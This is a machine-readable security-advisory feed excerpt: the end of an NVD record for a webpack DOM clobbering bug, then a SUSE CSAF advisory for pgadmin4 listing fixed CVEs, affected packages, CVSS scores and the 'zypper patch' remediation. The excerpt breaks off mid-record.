"https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { source: "security-advisories@github.com", url: "https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270", }, { source: "security-advisories@github.com", tags: [ "Exploit", "Vendor Advisory", ], url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { source: "security-advisories@github.com", tags: [ "Exploit", "Third Party Advisory", ], url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { source: "security-advisories@github.com", tags: [ "Exploit", "Mitigation", "Technical Description", "Third Party Advisory", ], url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], sourceIdentifier: "security-advisories@github.com", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-79", }, ], source: "security-advisories@github.com", type: "Secondary", }, { description: [ { lang: "en", value: "CWE-79", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
suse-su-2024:3771-1
Vulnerability from csaf_suse
Published
2024-10-29 12:55
Modified
2024-10-29 12:55
Summary
Security update for pgadmin4
Notes
Title of the patch
Security update for pgadmin4
Description of the patch
This update for pgadmin4 fixes the following issues:
- CVE-2024-38355: Fixed socket.io: unhandled 'error' event (bsc#1226967)
- CVE-2024-38998: Fixed requirejs: prototype pollution via function config (bsc#1227248)
- CVE-2024-38999: Fixed requirejs: prototype pollution via function s.contexts._.configure (bsc#1227252)
- CVE-2024-39338: Fixed axios: server-side request forgery due to requests for path relative URLs being processed as protocol relative URLs in axios (bsc#1229423)
- CVE-2024-4067: Fixed micromatch: vulnerable to Regular Expression Denial of Service (ReDoS) (bsc#1224366)
- CVE-2024-4068: Fixed braces: fails to limit the number of characters it can handle, which could lead to Memory Exhaustion (bsc#1224295)
- CVE-2024-43788: Fixed webpack: DOM clobbering gadget in AutoPublicPathRuntimeModule could lead to XSS (bsc#1229861)
- CVE-2024-48948: Fixed elliptic: ECDSA signature verification error due to leading zero may reject legitimate transactions in elliptic (bsc#1231684)
- CVE-2024-48949: Fixed elliptic: Missing Validation in Elliptic's EDDSA Signature Verification (bsc#1231564)
- CVE-2024-9014: Fixed OAuth2 issue that could lead to information leak (bsc#1230928)
Patchnames
SUSE-2024-3771,SUSE-SLE-Module-Python3-15-SP6-2024-3771,openSUSE-SLE-15.6-2024-3771
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Security update for pgadmin4", title: "Title of the patch", }, { category: "description", text: "This update for pgadmin4 fixes the following issues:\n\n- CVE-2024-38355: Fixed socket.io: unhandled 'error' event (bsc#1226967)\n- CVE-2024-38998: Fixed requirejs: prototype pollution via function config (bsc#1227248)\n- CVE-2024-38999: Fixed requirejs: prototype pollution via function s.contexts._.configure (bsc#1227252)\n- CVE-2024-39338: Fixed axios: server-side request forgery due to requests for path relative URLs being processed as protocol relative URLs in axios (bsc#1229423)\n- CVE-2024-4067: Fixed micromatch: vulnerable to Regular Expression Denial of Service (ReDoS) (bsc#1224366)\n- CVE-2024-4068: Fixed braces: fails to limit the number of characters it can handle, which could lead to Memory Exhaustion (bsc#1224295)\n- CVE-2024-43788: Fixed webpack: DOM clobbering gadget in AutoPublicPathRuntimeModule could lead to XSS (bsc#1229861)\n- CVE-2024-48948: Fixed elliptic: ECDSA signature verification error due to leading zero may reject legitimate transactions in elliptic (bsc#1231684)\n- CVE-2024-48949: Fixed elliptic: Missing Validation in Elliptic's EDDSA Signature Verification (bsc#1231564)\n- CVE-2024-9014: Fixed OAuth2 issue that could lead to information leak (bsc#1230928)\n", title: "Description of the patch", }, { category: "details", text: "SUSE-2024-3771,SUSE-SLE-Module-Python3-15-SP6-2024-3771,openSUSE-SLE-15.6-2024-3771", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2024_3771-1.json", }, { category: "self", summary: "URL for SUSE-SU-2024:3771-1", url: "https://www.suse.com/support/update/announcement/2024/suse-su-20243771-1/", }, { category: "self", summary: "E-Mail link for SUSE-SU-2024:3771-1", url: "https://lists.suse.com/pipermail/sle-security-updates/2024-October/019689.html", }, { category: "self", summary: "SUSE Bug 1224295", url: "https://bugzilla.suse.com/1224295", }, { category: "self", summary: "SUSE Bug 1224366", url: "https://bugzilla.suse.com/1224366", }, { category: "self", summary: "SUSE Bug 1226967", url: "https://bugzilla.suse.com/1226967", }, { category: "self", summary: "SUSE Bug 1227248", url: "https://bugzilla.suse.com/1227248", }, { category: "self", summary: "SUSE Bug 1227252", url: "https://bugzilla.suse.com/1227252", }, { category: "self", summary: "SUSE Bug 1229423", url: "https://bugzilla.suse.com/1229423", }, { category: "self", summary: "SUSE Bug 1229861", url: "https://bugzilla.suse.com/1229861", }, { category: "self", summary: "SUSE Bug 1230928", url: "https://bugzilla.suse.com/1230928", }, { category: "self", summary: "SUSE Bug 1231564", url: "https://bugzilla.suse.com/1231564", }, { category: "self", summary: "SUSE Bug 1231684", url: "https://bugzilla.suse.com/1231684", }, { category: "self", summary: "SUSE CVE CVE-2024-38355 page", url: "https://www.suse.com/security/cve/CVE-2024-38355/", }, { category: "self", summary: "SUSE CVE CVE-2024-38998 page", url: "https://www.suse.com/security/cve/CVE-2024-38998/", }, { category: "self", summary: "SUSE CVE CVE-2024-38999 page", url: "https://www.suse.com/security/cve/CVE-2024-38999/", }, { category: "self", summary: "SUSE CVE CVE-2024-39338 page", url: "https://www.suse.com/security/cve/CVE-2024-39338/", }, { category: "self", summary: "SUSE CVE CVE-2024-4067 page", url: "https://www.suse.com/security/cve/CVE-2024-4067/", }, { category: "self", summary: "SUSE CVE CVE-2024-4068 page", url: "https://www.suse.com/security/cve/CVE-2024-4068/", }, { category: "self", summary: "SUSE CVE CVE-2024-43788 page", url: "https://www.suse.com/security/cve/CVE-2024-43788/", }, { category: "self", summary: "SUSE CVE CVE-2024-48948 page", url: "https://www.suse.com/security/cve/CVE-2024-48948/", }, { category: "self", summary: "SUSE CVE CVE-2024-48949 page", url: "https://www.suse.com/security/cve/CVE-2024-48949/", }, { category: "self", summary: "SUSE CVE CVE-2024-9014 page", url: "https://www.suse.com/security/cve/CVE-2024-9014/", }, ], title: "Security update for pgadmin4", tracking: { current_release_date: "2024-10-29T12:55:34Z", generator: { date: "2024-10-29T12:55:34Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "SUSE-SU-2024:3771-1", initial_release_date: "2024-10-29T12:55:34Z", revision_history: [ { date: "2024-10-29T12:55:34Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "pgadmin4-8.5-150600.3.6.1.noarch", product: { name: "pgadmin4-8.5-150600.3.6.1.noarch", product_id: "pgadmin4-8.5-150600.3.6.1.noarch", }, }, { category: "product_version", name: "pgadmin4-cloud-8.5-150600.3.6.1.noarch", product: { name: "pgadmin4-cloud-8.5-150600.3.6.1.noarch", product_id: "pgadmin4-cloud-8.5-150600.3.6.1.noarch", }, }, { category: "product_version", name: "pgadmin4-desktop-8.5-150600.3.6.1.noarch", product: { name: "pgadmin4-desktop-8.5-150600.3.6.1.noarch", product_id: "pgadmin4-desktop-8.5-150600.3.6.1.noarch", }, }, { category: "product_version", name: "pgadmin4-doc-8.5-150600.3.6.1.noarch", product: { name: "pgadmin4-doc-8.5-150600.3.6.1.noarch", product_id: "pgadmin4-doc-8.5-150600.3.6.1.noarch", }, }, { category: "product_version", name: "pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", product: { name: "pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", product_id: "pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", }, }, { category: "product_version", name: "system-user-pgadmin-8.5-150600.3.6.1.noarch", product: { name: "system-user-pgadmin-8.5-150600.3.6.1.noarch", product_id: "system-user-pgadmin-8.5-150600.3.6.1.noarch", }, }, ], category: "architecture", name: "noarch", }, { branches: [ { category: "product_name", name: "SUSE Linux Enterprise Module for Python 3 15 SP6", product: { name: "SUSE Linux Enterprise Module for Python 3 15 SP6", product_id: "SUSE Linux Enterprise Module for Python 3 15 SP6", product_identification_helper: { cpe: "cpe:/o:suse:sle-module-python3:15:sp6", }, }, }, { category: "product_name", name: "openSUSE Leap 15.6", product: { name: "openSUSE Leap 15.6", product_id: "openSUSE Leap 15.6", product_identification_helper: { cpe: "cpe:/o:opensuse:leap:15.6", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "pgadmin4-8.5-150600.3.6.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6", product_id: "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", }, product_reference: "pgadmin4-8.5-150600.3.6.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Module for Python 3 15 SP6", }, { category: "default_component_of", full_product_name: { name: "pgadmin4-doc-8.5-150600.3.6.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6", product_id: "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", }, product_reference: "pgadmin4-doc-8.5-150600.3.6.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Module for Python 3 15 SP6", }, { category: "default_component_of", full_product_name: { name: "system-user-pgadmin-8.5-150600.3.6.1.noarch as component of SUSE Linux Enterprise Module for Python 3 15 SP6", product_id: "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", }, product_reference: "system-user-pgadmin-8.5-150600.3.6.1.noarch", relates_to_product_reference: "SUSE Linux Enterprise Module for Python 3 15 SP6", }, { category: "default_component_of", full_product_name: { name: "pgadmin4-8.5-150600.3.6.1.noarch as component of openSUSE Leap 15.6", product_id: "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", }, product_reference: "pgadmin4-8.5-150600.3.6.1.noarch", relates_to_product_reference: "openSUSE Leap 15.6", }, { category: "default_component_of", full_product_name: { name: "pgadmin4-cloud-8.5-150600.3.6.1.noarch as component of openSUSE Leap 15.6", product_id: "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", }, product_reference: "pgadmin4-cloud-8.5-150600.3.6.1.noarch", relates_to_product_reference: "openSUSE Leap 15.6", }, { category: "default_component_of", full_product_name: { name: "pgadmin4-desktop-8.5-150600.3.6.1.noarch as component of openSUSE Leap 15.6", product_id: "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", }, product_reference: "pgadmin4-desktop-8.5-150600.3.6.1.noarch", relates_to_product_reference: "openSUSE Leap 15.6", }, { category: "default_component_of", full_product_name: { name: "pgadmin4-doc-8.5-150600.3.6.1.noarch as component of openSUSE Leap 15.6", product_id: "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", }, product_reference: "pgadmin4-doc-8.5-150600.3.6.1.noarch", relates_to_product_reference: "openSUSE Leap 15.6", }, { category: "default_component_of", full_product_name: { name: "pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch as component of openSUSE Leap 15.6", product_id: "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", }, product_reference: "pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", relates_to_product_reference: "openSUSE Leap 15.6", }, { category: "default_component_of", full_product_name: { name: "system-user-pgadmin-8.5-150600.3.6.1.noarch as component of openSUSE Leap 15.6", product_id: "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", }, product_reference: "system-user-pgadmin-8.5-150600.3.6.1.noarch", relates_to_product_reference: "openSUSE Leap 15.6", }, ], }, vulnerabilities: [ { cve: "CVE-2024-38355", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2024-38355", }, ], notes: [ { category: "general", text: "Socket.IO is an open source, real-time, bidirectional, event-based, communication framework. A specially crafted Socket.IO packet can trigger an uncaught exception on the Socket.IO server, thus killing the Node.js process. This issue is fixed by commit `15af22fc22` which has been included in `socket.io@4.6.2` (released in May 2023). The fix was backported in the 2.x branch as well with commit `d30630ba10`. Users are advised to upgrade. Users unable to upgrade may attach a listener for the \"error\" event to catch these errors.\n", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2024-38355", url: "https://www.suse.com/security/cve/CVE-2024-38355", }, { category: "external", summary: "SUSE Bug 1226965 for CVE-2024-38355", url: "https://bugzilla.suse.com/1226965", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 7.5, baseSeverity: "HIGH", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, ], threats: [ { category: "impact", date: "2024-10-29T12:55:34Z", details: "important", }, ], title: "CVE-2024-38355", }, { cve: "CVE-2024-38998", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2024-38998", }, ], notes: [ { category: "general", text: "** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: none. Reason: This candidate was withdrawn by its CNA. Further investigation showed that it was not a security issue. Notes: none.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2024-38998", url: "https://www.suse.com/security/cve/CVE-2024-38998", }, { category: "external", summary: "SUSE Bug 1227247 for CVE-2024-38998", url: "https://bugzilla.suse.com/1227247", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 8.6, baseSeverity: "HIGH", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, ], threats: [ { category: "impact", date: "2024-10-29T12:55:34Z", details: "important", }, ], title: "CVE-2024-38998", }, { cve: "CVE-2024-38999", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2024-38999", }, ], notes: [ { category: "general", text: "jrburke requirejs v2.3.6 was discovered to contain a prototype pollution via the function s.contexts._.configure. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2024-38999", url: "https://www.suse.com/security/cve/CVE-2024-38999", }, { category: "external", summary: "SUSE Bug 1227251 for CVE-2024-38999", url: "https://bugzilla.suse.com/1227251", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 8.6, baseSeverity: "HIGH", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, ], threats: [ { category: "impact", date: "2024-10-29T12:55:34Z", details: "important", }, ], title: "CVE-2024-38999", }, { cve: "CVE-2024-39338", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2024-39338", }, ], notes: [ { category: "general", text: "axios 1.7.2 allows SSRF via unexpected behavior where requests for path relative URLs get processed as protocol relative URLs.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2024-39338", url: "https://www.suse.com/security/cve/CVE-2024-39338", }, { category: "external", summary: "SUSE Bug 1229421 for CVE-2024-39338", url: "https://bugzilla.suse.com/1229421", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 7.4, baseSeverity: "HIGH", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, ], threats: [ { category: "impact", date: "2024-10-29T12:55:34Z", details: "critical", }, ], title: "CVE-2024-39338", }, { cve: "CVE-2024-4067", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2024-4067", }, ], notes: [ { category: "general", text: "The NPM package `micromatch` prior to 4.0.8 is vulnerable to Regular Expression Denial of Service (ReDoS). The vulnerability occurs in `micromatch.braces()` in `index.js` because the pattern `.*` will greedily match anything. By passing a malicious payload, the pattern matching will keep backtracking to the input while it doesn't find the closing bracket. As the input size increases, the consumption time will also increase until it causes the application to hang or slow down. There was a merged fix but further testing shows the issue persists. This issue should be mitigated by using a safe pattern that won't start backtracking the regular expression due to greedy matching. This issue was fixed in version 4.0.8.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2024-4067", url: "https://www.suse.com/security/cve/CVE-2024-4067", }, { category: "external", summary: "SUSE Bug 1224255 for CVE-2024-4067", url: "https://bugzilla.suse.com/1224255", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 SP6:system-user-pgadmin-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-cloud-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-desktop-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-doc-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:pgadmin4-web-uwsgi-8.5-150600.3.6.1.noarch", "openSUSE Leap 15.6:system-user-pgadmin-8.5-150600.3.6.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 7.5, baseSeverity: "HIGH", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "SUSE Linux Enterprise Module for Python 3 15 SP6:pgadmin4-8.5-150600.3.6.1.noarch", "SUSE Linux Enterprise Module for Python 3 15 